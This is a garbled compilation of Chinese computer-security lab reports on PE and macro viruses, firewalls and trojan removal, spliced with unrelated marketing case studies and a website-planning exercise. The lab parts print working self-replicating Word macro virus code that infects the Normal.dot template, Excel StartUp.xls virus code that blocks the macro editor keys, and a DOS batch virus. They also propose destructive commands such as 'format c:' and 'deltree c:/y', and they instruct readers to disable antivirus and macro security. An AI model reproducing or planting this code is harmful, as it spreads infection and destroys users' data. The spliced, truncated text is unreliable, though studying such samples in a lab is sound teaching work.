实验三 PE文件型病毒分析
一、实验目的
1.了解PE文件型病毒的基本原理;
2.了解病毒的感染、破坏机制,认识病毒程序;
3.掌握文件型病毒的特征和内在机制。
【注意事项】
1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。
2.若在个人电脑上实验,最好在虚拟机中运行。
3.测试完毕后,请注意病毒程序的清除,以免误操作破坏计算机上的其他程序。
4.请勿传播该病毒。传播该病毒造成有用数据丢失、电脑故障甚至触犯法律等后果,由传播者负责。
二、实验内容
压缩包中包括编译的病毒程序“PE_Virus.exe”和一个用于测试病毒的正常文件“test.exe”,通过运行病毒程序观看各步提示以了解PE文件型病毒的内在机制。
【PE_Virus病毒说明】
(1)传染范围:PE_Virus.exe所在目录;
(2)传染目标:可执行文件(.exe);
(3)传染过程:搜索目录内的可执行文件,逐个感染;
(4)触发条件:运行PE_Virus.exe程序或被PE_Virus.exe感染的程序;
(5)破坏能力:无害型,传染时减少磁盘的可用空间,在可执行文件上附加一个4K大小的节;
(6)破坏方式:攻击文件,在可执行文件上附加一个节(4K),修改可执行文件的入口地址;
(7)特征类型:Virus.Win32.Huhk.B(360提示)
【PE文件型病毒主要技术原理】
(1)病毒重定位
(2)获取API函数
(3)搜索可感染的文件
(4)内存映射文件
(5)病毒感染其他文件
(6)返回到宿主程序
任务1 观察PE_Virus病毒感染test.exe文件的过程
【提示】
(1)用360等杀毒软件检测PE_Virus.exe,杀毒软件检测到该文件有病毒。
(2)关闭防病毒软件的自动防护功能,运行PE_Virus.exe,会出现如下提示:
本实验为了能够比较直观演示病毒程序,让用户知道病毒正在做什么,故而有若干提示界面,但实际的病毒在感染其他程序前不会让用户感觉到病毒程序正在运行,往往都是隐藏运行,或者是寄生在宿主程序中。
(3)接下来会有若干提示,主要有:
①查找当前目录中符合条件的文件
为了减少病毒破坏的范围,在编写该病毒程序时,限定其感染范围为当前目录内感染,这也同时减少了病毒的破坏范围。
②判断找到的文件是否可感染
PE_Virus.exe可以感染的目标程序为PE文件中的可执行文件(.exe)。
③感染文件
PE_Virus.exe感染方式是在宿主文件附加一个节(4K),被感染的宿主程序运行时先跳转到该节处,运行感染代码,感染结束后再返回宿主程序的入口地址执行宿主程序。
④暂停
病毒程序中加入sleep代码。在手工查毒时,有时需判断当前机器是否有异常程序在运行,如果机器没有明显的程序在运行,而硬盘的指示灯一直闪烁,在高速运转着,则可粗略判断机器有异常程序在运行。对于病毒程序而言,就需要通过sleep一
段时间再去感染下一个文件,以降低被发现的可能性。
⑤返回宿主程序。
感染结束或用户取消后就会运行宿主程序。
如果我们隐藏前面的这些步骤的对话框和主界面,则给用户的感觉就是运行了一个正常的程序,只是程序启动运行的时间相对慢了一点,这也就体现了病毒程序的潜伏性这一特征。
任务2 比较test.exe文件被病毒感染前后的区别
使用Winhex或PEView等工具软件,分别观察test.exe感染病毒前后的有关参数,完成下表:
Test.exe 感染病毒前感染病毒后
文件大小1536B
Number Of Sections
Size Of Code
Size Of Image
Address Of EntryPoint
增加的节名无IS
增加的节大小(Virtual Size) 无
任务3 观察感染了病毒的test.exe文件运行的情况
运行染毒后的test.exe文件,可以发现test.exe已成为病毒PE_Virus.exe携带者,并已具有病毒程序PE_Virus.exe的特征,运行test.exe来检查程序被感染的情况以及该程序是否具有感染功能,在演示时为了能够测试效果,应该再复制其他的正常的可执行文件到test.exe 所在的目录。
【思考】
(1)PE_Virus是否会对已感染病毒的test.exe再次感染?为什么?
Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 2.实验所需条件和环境 硬件设备:局域网,终端PC机。 系统软件:Windows系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问 实验环境配置如下图所示: 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过
多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 3.1. 例1 自我复制,感染word公用模板和当前文档 代码如下: 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具→宏→Visual Basic→宏编辑器),在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下: 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将
4、请给出一个计算机病毒的样本,并剖析其工作原理。没有计算机病毒样本数据的同学,可以求助于老师。(20分) 举一个“hello word”例子。 下面是一个简单的DOS批处理病毒源程序autoexec.bat(假设从A盘启动):程序语句程序注解 IF exist c:\\autoexec.bat goto Virus REM 首先检查时机 Goto No_Virus REM 若时机不成熟则潜伏 :Virus REM 时机成熟时(子程序) c: REM 转到C盘 ren autoexec.bat auto.bat REM 将正常文件改名,准备冒名顶替 copy a:\\autoexec.bat c:\\ REM 自我复制,开始繁殖 echo Hello Word! REM 病毒发作,表现症状 :No_Virus REM 正常程序入口 a: REM 转回A盘 /auto REM 执行正常程序 pause REM 暂停等待按任意键继续 这个程序非常简单,但却包含了计算机病毒的典型结构,引导部分、传染部分、激发部分等五脏俱全。其触发机制是:C盘存在autoexec.bat文件,当我们用带有此病毒的启动软盘启动微机时,若C盘也有autoexec.bat文件,则病毒将C盘原autoexec.bat文件改名为auto.bat,把自身复制到C盘并显示“Hello Word!”。如果按以前的分类,它可以算是个良性病毒(但再良的病毒都要占用系统资源)。当然它还无加密和没有严重破坏系统的行为,但要是把echo Hello Word!改为format c:或deltree c:/y等那就……糟了~~~
南京信息工程大学实验(实习)报告 实验(实习)名称防火墙实验(实习)日期2012.12.6指导教师朱节中 专业10软件工程年级大三班次2姓名蔡叶文学号 20102344042 得分 【实验名称】 防火墙实验 【实验目的】 掌握防火墙的基本配置;掌握防火墙安全策略的配置。 【背景描述】 1.用接入广域网技术(NA T),将私有地址转化为合法IP地址。解决IP地址不足的问题,有效避免来自外部网络的攻击,隐藏并保护内部网络的计算机。 2.网络地址端口转换NAPT(Network Address Port Translation)是人们比较常用的一种NA T方式。它可以将中小型的网络隐藏在一个合法的IP地址后面,将内部连接映射到外部网络中的一个单独的IP地址上,同时在该地址上加上一个由NA T设备选定的TCP端口号。 3.地址绑定:为了防止内部人员进行非法IP盗用(例如盗用权限更高人员的IP地址,以获得权限外的信息),可以将内部网络的IP地址与MAC地址绑定,盗用者即使修改了IP 地址,也因MAC地址不匹配而盗用失败,而且由于网卡MAC地址的唯一确定性,可以根据MAC地址查出使用该MAC地址的网卡,进而查出非法盗用者。报文中的源MAC地址与IP地址对如果无法与防火墙中设置的MAC地址与IP地址对匹配,将无法通过防火墙。 4.抗攻击:锐捷防火墙能抵抗以下的恶意攻击:SYN Flood攻击;ICMP Flood攻击;Ping of Death 攻击;UDP Flood 攻击;PING SWEEP攻击;TCP端口扫描;UDP端口扫描;松散源路由攻击;严格源路由攻击;WinNuke攻击;smuef攻击;无标记攻击;圣诞树攻击;TSYN&FIN攻击;无确认FIN攻击;IP安全选项攻击;IP记录路由攻击;IP流攻击;IP时间戳攻击;Land攻击;tear drop攻击。 【小组分工】 组长:IP:192.168.10.200 管理员 :IP:172.16.5.4 策略管理员+日志审计员 :IP:172.16.5.3 日志审计员 :IP:172.16.5.2 策略管理员 :IP:172.16.5.1 配置管理员 【实验设备】 PC 五台 防火墙1台(RG-Wall60 每实验台一组) 跳线一条 【实验拓扑】
清除宏病毒,名字是:StartUp.xls方法 --大白菜 文中图片都很小,看不清楚,可以用以下快捷方式:按住ctrl 向上滚动鼠标滑轮可以放大word,就可以看清楚图片了 病毒样本如下:(下面是宏病毒代码,电脑知识欠缺的,千万被乱动哦,小心弄巧成拙) Vba代码 =================宏病毒代码复制从下一行开始================= Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.doczj.com/doc/cd15718490.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.doczj.com/doc/cd15718490.html,
网络安全实验报告 务书 一、目的与要求根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上,能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各类安全问题,维护网络及操作系统的安全。 二、主要内容实验一加密认证通信系统实现设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语言不限,可以直接调用现有模块,认证和加密不限)实验二 综合扫描及安全评估利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从而提高系统的安全性能。实验三 网络攻防技术矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地解决各种威胁。实验四 Windows系统安全配置方案作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往忽视了OS的安
全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵检测软件来加强系统的安全。其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房的网络信息安全综合实验系统上完成。 三、进度计划序号设计(实验)内容完成时间备注1接受任务,查阅文献,开始实现密码算法和认证算法第一天2完成加密认证通信系统第二至七天3上午完成综合扫描及安全评估实验,下午进行网络攻防实验第八天4上午完成网络攻防实验,下午进行系统安全配置实验第九天5撰写实验报告并验收第天 四、实验成果要求 1、要求程序能正常运行,并实现任务书要求功能。 2、完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重对设计思路的归纳和对问题解决过程的总结。 五、考核方式平时成绩+程序验收+实验报告。 学生姓名: 指导教师:xx 年6 月13 日实验报告题目: 网络信息安全综合实验院系: 计算机系班级:
实验五宏病毒分析及清除实验 姓名:xxx 学号:xxxxxxxx 日期:2014年4月26日 专业:计算机科学与技术 一、实验目的 ?了解“宏病毒”机理; ?掌握清除宏病毒的方法; ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows2003操作系统; ?Office Word2003字处理软件。 三、实验内容 1.软件设置 关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。 注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 2.自我复制功能演示 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 完整代码如下:
组网配置实验报告 参赛队名:西南交通大学1队完成时间:17:30 1.实验目的: 通过实验模拟校园网络内部的具体功能和三层结构: a.模拟网络的3层结构如下: 核心层——负责进行数据的快速转发。 汇聚层——负责汇集分散的接入点,进行数据交换,提供流量控制和用户管理功能。 接入层——负责提供各种类型用户的接入,在有需要时提供用户流量控制功能。 路由采用RG-R1700,用模块化结构设计,具有1个网络/语音模块插槽,支持种类丰富、功能齐全、高密度的网络/语音模块,可实现更多的组合应用。采用64位的微处理器技术,CPU为Motorola PowerPC 8248,主频高达到266MHz,固化两个10/100M快速以太口,2个高速同步口;提供丰富的网络安全特性,支持哑终端接入服务器功能;提供完备的冗余备份解决方案,支持VoIP特性、IP 组播协议,支持IPv4/IPv6,有丰富的QoS特性。 核心层采用RG-S3760-24,硬件支持IPv4/IPv6双协议栈多层线速交换和功能特性,为IPv6网络之间的通信提供了丰富的Tunnel技术,并提供了丰富而完善的路由协议,内在的安全防御机制和用户管理能力,更可有效防止和控制病毒传播和网络攻击,控制非法用户接入和使用网络,保证合法用户合理化使用网络资源,充分保障网络安全、网络合理化使用和运营;提供了多种形式的管理工具如SNMP、Telnet、Web和Console口等。 汇聚层采用RG-S3550-24,硬件支持多层交换,提供二到七层的智能的流分类和完善的服务质量(QoS)以及组播管理特性,支持完善的路由协议,并可以根据网络实际使用环境,实施灵活多样的安全控制策略,可有效防止和控制病毒传播和网络攻击,控制非法用户使用网络,保证合法用户合理使用网络资源,充分保障网络安全和网络合理化使用和运营。可通过SNMP、Telnet、Web和Console 口等多种方式提供丰富的管理。 接入层采用STAR-S2126G,是一款高性能、高安全、可堆叠的网管型以太网交换机。基于高背板的全线速设计,提供智能流分类和完善的服务质量(QoS)以及组播管理特性,使其在企业级网络多种应用中,实施灵活多样的ACL访问控制和安全防范;同时,配合灵活的堆叠功能,使得本地高密度端口可随时被智能集中管理,方便较大规模网络用户在接入层的数据集中管理;另外,针对不同的管理手段,分别提供了SNMP、Telnet、Web和Console口等多种管理方式。
营销背景: 随着中国男士使用护肤品习惯的转变,男士美容市场的需求逐渐上升,整个中国男士护肤品市场也逐渐走向成熟,近两年的发展速度更是迅速,越来越多的中国年轻男士护肤已从基本清洁开始发展为护理,美容的成熟消费意识也逐渐开始形成。 2012年欧莱雅中国市场分析显示,男性消费者初次使用护肤品和个人护理品的年龄已经降到22岁,男士护肤品消费群区间已经获得较大扩张。虽然消费年龄层正在扩大,即使是在经济最发达的北京、上海、杭州、深圳等一线城市,男士护理用品销售额也只占整个化妆品市场的10%左右,全国的平均占比则远远低于这一水平。作为中国男士护肤品牌,欧莱雅男士对该市场的上升空间充满信心,期望进一步扩大在中国年轻男士群体的市场份额,巩固在中国男妆市场的地位。 营销目标: 1、推出新品巴黎欧莱雅男士极速激活型肤露,即欧莱雅男士BB 霜,品牌主希望迅速占领中国男士BB霜市场,树立该领域的品牌地位,并希望打造成为中国年轻男性心目中的人气最高的BB霜产品。 2、欧莱雅男士BB霜目标客户定位于18岁到25岁的人群,他们是一群热爱分享,热衷于社交媒体,并已有一定护肤习惯的男士群体。 执行方式:
面对其他男妆品牌主要针对"功能性"诉求的网络传播,麦肯旗下的数字营销公司MRM携手欧莱雅男士将关注点放在中国年轻男性的情感需求上,了解到年轻男士的心态在于一个"先"字,他们想要领先一步,先同龄人一步。因此,设立了"我是先型者"的创意理念。 为了打造该产品的网络知名度,欧莱雅男士针对目标人群,同时开设了名为@型男成长营的微博和微信帐号,开展一轮单纯依靠社交网络和在线电子零售平台的网络营销活动。 1、在新浪微博上引发了针对男生使用BB的接受度的讨论,发现男生以及女生对于男生使用BB的接受度都大大高于人们的想象,为传播活动率先奠定了舆论基础。 2、有了代言人"阮经天"的加入,发表属于他的先型者宣言:"我负责有型俊朗,黑管BB负责击退油光、毛孔、痘印,我是先型者阮经天",号召广大网民,通过微博申请试用活动,发表属于自己的先型者宣言。微博营销产生了巨大的参与效应,更将微博参与者转化为品牌的主动传播者。 3、在京东商城建立了欧莱雅男士BB霜首发专页,开展"占尽先机,万人先型"的首发抢购活动,设立了欧莱雅男士微博部长,为关于BB霜使用者提供的一对一的专属定制服务。另外,特别开通的微信专属平台,每天即时将从新品上市到使用教程、前后对比等信息均通过微信推送给关注巴黎欧莱雅男士公众微信的每一位用户。 营销效果:
实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1.任务性质:验证性实验 2.任务描述:下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。 3.任务步骤: (1)打开Word2000,新建一个文档名为“test”; (2)点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮; (3)在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA; (4)点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”; (5)点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB项目的访问”; (6)保存并关闭“test”文档; (7)新建一个文档test1,关闭后重新打开,观察test1是否被感染。 (8)清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4.示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count
病毒样本分析实例 0×01事件经过 2016年2月26日,一个网络安全相关的QQ群内,一名用户分享了一份名为“网络安全宝典.chm”的电子书供大家下载,网络安全工程师Bfish自然地下载了这本电子书,打算简单翻阅后决定是否收藏。当Bfish打开这个才12K大小的电子书时,感知到了计算机的异常行为,这让他意识到:这本电子书有问题。 在解开这份CHM文档后,网络安全工程师在一个html页面中找到了原因:这个电子书中的某个HTML页面内,嵌入了一段恶意代码,它可以下载一个PowerShell脚本并执行。顺藤摸瓜,Bfish最终确认了这是一个针对特定人群,以盗取用户帐号密码、文档资料为目的恶意攻击事件。这段CHM恶意代码如同幽灵一样被执行并作恶,故将此称之为幽灵电子书(ChmGhost)。 0×02主要危害 通过电子书散播,攻击受众有很强的群体性,对特定人群发起攻击简直易如反掌,而且电子书“诱饵”更容易迷惑大众。 目前看到的攻击代码,主要的危害为窃取用户隐私:Windows账户信息 和密码、各类应用程序的密码、计算机基本信息、屏幕截图、网络配置 和Wi-Fi信息、各类文档,造成用户敏感信息和资料泄漏。这些资料的 泄漏伴随着商业机密泄漏的风险,后续或造成更大的损失。 另外,攻击时所用的恶意代码,无论是二进制还是脚本,几乎都来自网络下载,攻击可以随时开启和关闭,攻击手法、攻击目的也都可以变化,这个“后门”的潜在危害也相当之大。
2月26日发现的CHM的标题是网络安全相关的,并且在网络安全相关的QQ群内散播,表明攻击者的目标是网络安全从业和对网络安全感兴趣的、有一定计算机安全基础的群体,但就算如此,仅一天时间就已经有多名受害者,如果攻击者转到其他领域,受众群体应该会更没有感知能力,危害也将更大。 0×03攻击实施纵览 0×04详细技术分析
实验报告模板
【实验目的】(简要描述实验目的) 采用免杀、混淆等技术的恶意代码有可能突破安全软件的防护而运行在目标主机中。即使用户感受到系统出现异常,但是仅仅通过杀毒软件等也无法检测与根除恶意代码,此时需要用户凭借其它系统工具和对操作系统的了解对恶意代码手工查杀。本实验假设在已经确定木马进程的前提下,要求学生借助进程检测和注册表检测等系统工具,终止木马进程运行,消除木马程序造成的影响,从而实现手工查杀恶意代码的过程。 【实验结果及分析】(需要有结果截图) 一、恶意代码手工查杀实验 1、虚拟机快照 为防止虚拟机破坏后无法恢复,应先将干净的虚拟机进行快照设置。点击菜单“虚拟机”“快照”“拍摄快照”,创建一个干净的虚拟机快照。 2.创建被感染的系统环境 由于恶意代码采用了免杀技术,因此能够成功绕过防病毒等安全软件检测,等用户感到系统异常时,通常恶意代码已经在主机系统内加载运行。为了尽量模拟一个逼真的用户环境,我们在搭建好的虚拟机中运行木马宿主程序 “radar0.exe”。运行完后,可以看见,“radar0.exe”自动删除。
3.木马进程的定位 用户对系统的熟悉程度决定了发现系统异常继而查找恶意代码的早晚。在本例中,明显可以感受到系统运行速度变慢,打开任务管理器,可以观察到有一个“陌生”的进程(非系统进程或安装软件进程)“wdfmgr.exe”占用CPU比率很高。 为了确定该进程为木马进程,可以通过查找该进程的静态属性如创建时间、
开发公司、大小等,以及通过对该进程强制终止是否重启等现象综合判断。在本例中,“Wdfmgr.exe”为木马radar.exe运行后新派生的木马进程。 4.记录程序行为 打开工具“ProcMon.exe”,为其新增过滤规则“Process Name”“is”“wdfmgr.exe”,然后开始监控。点击“Add”将过滤规则加入,可以看到ProcMon开始监控“wdfmgr.exe”进程的行为。需要注意的是,有时为了保证观察到的行为完备性,会先启动ProcMon工具,然后再启动被监控进程。 为了分别观察该进程对文件系统和注册表的操作,点击菜单 “Tools”“File Summary”,观察对文件系统的修改。
2017病毒营销案例分析 2017病毒营销案例分析 2017病毒营销案例一 洗脑之神---脑白金 广告,很多人都几乎都被它彻底洗脑了,史玉柱的销售团队居然还放出了“脑白金体”的神论,但是现代科学的文献里根本没有这个名词,只有松果体这个词,因为脑白金的主要成分为松果体,不过现在也没有科学实验证明松果体对大脑有很好的疗效,不过副作用倒是不少,这些神论导致市面各大药房里的脑白金几乎销售一空,就连一些小学生在教师节的时候也会给老师送脑白金,可见脑白金的广告影响力之大。这就是脑白金的病毒式的营销策略。 我们来分析一下脑白金这种病毒式营销策略的实施步骤和战略方式。
一:提炼产品或服务传播价值。 这一点脑白金做的真的很优秀,史玉柱曾在演讲上提到过这样一个故事,他在商场看见一个戴眼镜的男士买了脑白金,就上去跟男士聊天,问他为什么要买脑白金,男士几乎迅速的说他自己十分讨厌脑白金广告,那问题来了,他为什么要买呢,答案是:一是过年了要送给父母,市面上有太多的礼品种类,不知道挑哪个好。二是在这些礼品里面自己唯一熟悉的就是脑白金。它还在做广告,做铺天盖地的广告。仔细想想这个企业应该还是很有钱的,这样推理至少产品的质量还能有保证吧。 二:创造信息传播的引爆点。 脑白金魔性广告的轮番式轰炸,让众多市民都有这三个感觉:俗、多、单调。但与其相反的却是脑白金的销售量极高,销售异常的火爆。 三:提供便捷的传播渠道。 病毒式营销的关键点就是让用户无意识的接受并且参 与病毒性信息的传播。面对380多家电视台同时在黄金时间
不低于2分钟的广告轰炸,意料之中的引起了市民对脑白金的热烈讨论。这样使得传播的渠道更加的开广。一传十,十传百。病毒已经悄然扩散。 四:营造病毒信息的传播。 众所周知,脑白金的广告词是今年过节不收礼,收礼只收脑白金。脑白金年轻态、健康品。脑白金放出的广告词堪称朗朗上口,十分易记,也就是说很利于传播,有品质感显档次,也符合本土化的特点。就是这样的病毒式营销战略,使得脑白金获得了巨大的利润。 然而就在最近,脑白金新一轮的轰炸又开始了。脑白金最新的TVC广告登陆各大卫视,再一次成功达到了洗脑的效果,也再一次创造了广告界的神话,之前“今年过节不收礼呀,收礼只收脑白金”的老头老太系列广告不见踪影。 新版的点赞广告不得不说再次刷新了大众的三观,广告雷人程度也是业内同行无法相比的。甚至有不少网友调侃“简直天雷滚滚”,更多的网友开始有点儿怀念起以前的老头老太系列广告,呼吁脑白金团队“把老头老太请回来”。
宏病毒实验报告 2 邹文敏 一、实验目的 通过运行计算机代码,更加深刻的理解计算机代码。对计算机代码有一个初步的认识。 加深对宏病毒的感性认识,宏病毒是感染数据文件word,office 等。 二、实验内容 运行自我复制,感染word公用模板和当前文档;具有一定破坏性的宏;清除宏病毒。 三、实验步骤 实验一: 将word文档中的开发者工具打开;word 中心→信任选项→宏设计将信任选项打开
运行第一个实验Visual Basic →normal →Microsoft→the document Project→microsoft word对象→the document复制如下代码:'APMP Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False '以上都是基本的自我隐藏措施 MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines( 1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
一.专业病毒分析师对提交的可疑文件进行分析的流程: 1.通过虚拟机模拟可疑文件的运行,检测他的动作。 2.反编译程序,通过汇编语言判断程序的性质 3.病毒分析师需要有熟练的各种分析软件的操作能力,还需要有强的汇编言知识,还需要对windows中程序底层运行方式有一定的了解 二.病毒的行为大致上分为4种: 1.对文件的操作 2.对注册表的的操作 3.对进程的操作 4.联网行为 所以,就要有分析这4种行为的工具. 三.具体分析过程 No.1 监视方法分析病毒. 分析过程中用到了大量的工具,这些工具分为专一型的,综合型的. ◆专一型的监视工具: 文件监视:FileMon 注册表监视:RegMon、Regsnap 进程监视:ProcView 网络监视:TcpView ◆综合型的监视工具: SSM:文件、注册表、进程、网络监视 E盾:文件、注册表、进程、网络监视 ProcMonitor:文件、注册表、进程监视 ◆内核分析、监视工具: 由于病毒大都会用内核方法隐藏自己,所以需要内核分析工具,常用的内核分析工具有下面的: IceSword SnipeSword Wsyscheck (推荐) ◆系统辅助分析工具: 其实有很多杀毒软件附带的工具就是很好的分析工具,举几个软件说下: 360安全卫士
卡卡上网安全助手 金山清理专家 ◆系统诊断工具: Sreng扫描报告 360安全卫士诊断工具 卡卡上网安全助手 瑞星听诊器 No.2反编译、调试方法分析病毒. 这种方法需要有更多的基础知识,需要了解系统内部工作原理和汇编语言.并且工具的运用也需要很多的训练… ※查壳工具 Peid FFI ※脱壳工具 FFI 各种壳的专用脱壳工具 ※反编译工具 W32dasm C32asm IDA pro ※文件hash校验工具 Hash HashCalc ※动态调试工具 OllyDbg SoftIce(这个比较难用) ※文件编辑工具
实验三网站规划书撰写 一、实验目的 1、了解网站规划的主要内容 2、掌握网站规划的要点 3、能够撰写专业的网站规划书 二、实验内容 网站规划是从网站开发目标到实际运用过程的全盘谋略与策划,是企业实施电子商务网站建设最重要的环节。网站规划既有战略性内容,也有战术性内容,对网站建设起到计划与指导的作用。在建立网站前应进行必要的市场分析,明确建设网站的目的,确定网站的功能、规模、投入费用等。只有详细的规划,才能避免在网站建设中出现的很多问题,使网站建设能顺利进行。 思考题: 1、网站规划书的主要内容有哪些? 一、建设网站前的市场分析 1、相关行业的市场是怎样的,有什么样的特点,是否能够在互联网上开展公司业务。 2、市场主要竞争者分析,竞争对手上网情况及其网站规划、功能作用。 3、公司自身条件分析、公司概况、市场优势,可以利用网站提升哪些竞争力,建设网站的能力(费用、技术、人力等)。 二、建设网站目的及功能定位1、为什么要建网站,是为了宣传产品,进行电子商务,还是建行业性网站?是企业的需要还是市场开拓的延伸?2、整合公司资源,确定网站功能。根据公司的需要和计划,确定网站的功能:产品宣传型、网上营销型、客户服务型、电子商务型等。3、根据网站功能,确定网站应达到的目的作用。 三、网站技术解决方案根据网站的功能确定网站技术解决方案。1、租用虚拟主机的配置。2、网站安全性措施,防黑、防病毒方案。3、相关程序开发。如网页程序ASP、JSP、CGI、数据库程序等。 四、网站内容规划1、根据网站的目的和功能规划网站内容,一般企业网站应包括:公司简介、产品介绍、服务项目、价格信息、联系方式、网上定单等基本内容。2、电子商务类网站要提供会员注册、详细的商品服务信息、信息搜索查询、定单确认、付款、相关帮助等。3、如果网站栏目比较多,则考虑采用网站编程专人负责相关内容。注意:网站内容是网站吸引浏览者最重要的因素,无内容或不实用的信息不会吸引匆匆浏览的访客。可事先对人们希望阅读的信息进行调查,并在网站发布后调查人们对网站内容的满意度,以及时调整网站内容。 五、网页设计1、网页设计一般要与企业整体形象一致,要符合CI规范。要注意网页色彩、图片的应用及版面规划,保持网页的整体一致性。2、新技术的采用要考虑主要目标访问群体的分布地域、年龄阶层、网络速度、阅读习惯等。3、制定网页改版计划,如半年到一年时间进行较大规模改版等。 